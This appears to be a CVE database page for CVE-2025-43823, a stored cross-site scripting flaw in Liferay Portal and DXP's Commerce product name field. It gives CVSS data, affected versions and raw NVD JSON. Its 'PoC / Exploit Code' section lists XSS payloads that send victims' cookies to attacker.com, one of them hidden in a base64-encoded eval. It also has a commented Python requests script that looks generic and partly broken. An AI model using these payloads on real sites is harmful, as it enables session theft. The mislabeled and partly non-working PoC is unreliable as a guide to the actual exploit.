Security Vulnerability Report
CVE-2025-43823 CVSS 5.4 MEDIUM

CVE-2025-43823

Published: 2025-10-07 22:15:34
Last Modified: 2025-12-15 18:04:11

Description

Cross-site scripting (XSS) vulnerability in the Commerce Search Result widget in Liferay Portal 7.4.0 through 7.4.3.111, and Liferay DXP 2023.Q4 before patch 6, 2023.Q3 before patch 9, and 7.4 GA through update 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a Commerce Product's Name text field.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 - 7.4.3.111
Liferay DXP 2023.Q4 < patch 6
Liferay DXP 2023.Q3 < patch 9
Liferay DXP 7.4 GA - update 92

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-43823 PoC: XSS via Commerce Product Name field -->
<!-- Step 1: Login to Liferay Portal with a user account that has Commerce Product edit permissions -->
<!-- Step 2: Navigate to Commerce > Products and create/edit a product -->
<!-- Step 3: In the Product Name field, inject the following XSS payload: -->
<script>alert('XSS-CVE-2025-43823');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>
<!-- Alternative payloads (bypassing basic filters): -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">
<svg/onload=alert(document.domain)>
<body onload="eval(atob('ZmV0Y2goJ2h0dHBzOi8vYXR0YWNrZXIuY29tLz9kPScrZG9jdW1lbnQuY29va2llKQ=='))">
<!-- Step 4: Save the product -->
<!-- Step 5: As a victim, navigate to the Commerce Search page and search for the product -->
<!-- Step 6: When the search results are displayed, the malicious script executes in the victim's browser context -->
<!-- Automated exploitation example using Python requests: -->
# import requests
# session = requests.Session()
# # Login to Liferay
# session.post('https://liferay.example.com/web/guest/home', data={'_58_login': 'user', '_58_password': 'pass'})
# # Create/edit product with XSS payload in name
# payload = '<script>alert(document.cookie)</script>'
# session.post('https://liferay.example.com/group/control_panel/manage?p_p_id=com_liferay_commerce_product_definitions_web_internal_portlet_CPDefinitionsPortlet',
#     data={'name': payload, ...})

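References

https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43823 (Vendor Advisory)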

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43823", "sourceIdentifier": "[email protected]", "published": "2025-10-07T22:15:34.430", "lastModified": "2025-12-15T18:04:10.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the Commerce Search Result widget in Liferay Portal 7.4.0 through 7.4.3.111, and Liferay DXP 2023.Q4 before patch 6, 2023.Q3 before patch 9, and 7.4 GA through update 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a Commerce Product's Name text field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3.112", "matchCriteriaId": "2D6470C7-9D36-43F3-86CB-B79ED9EA53F4"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43823", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}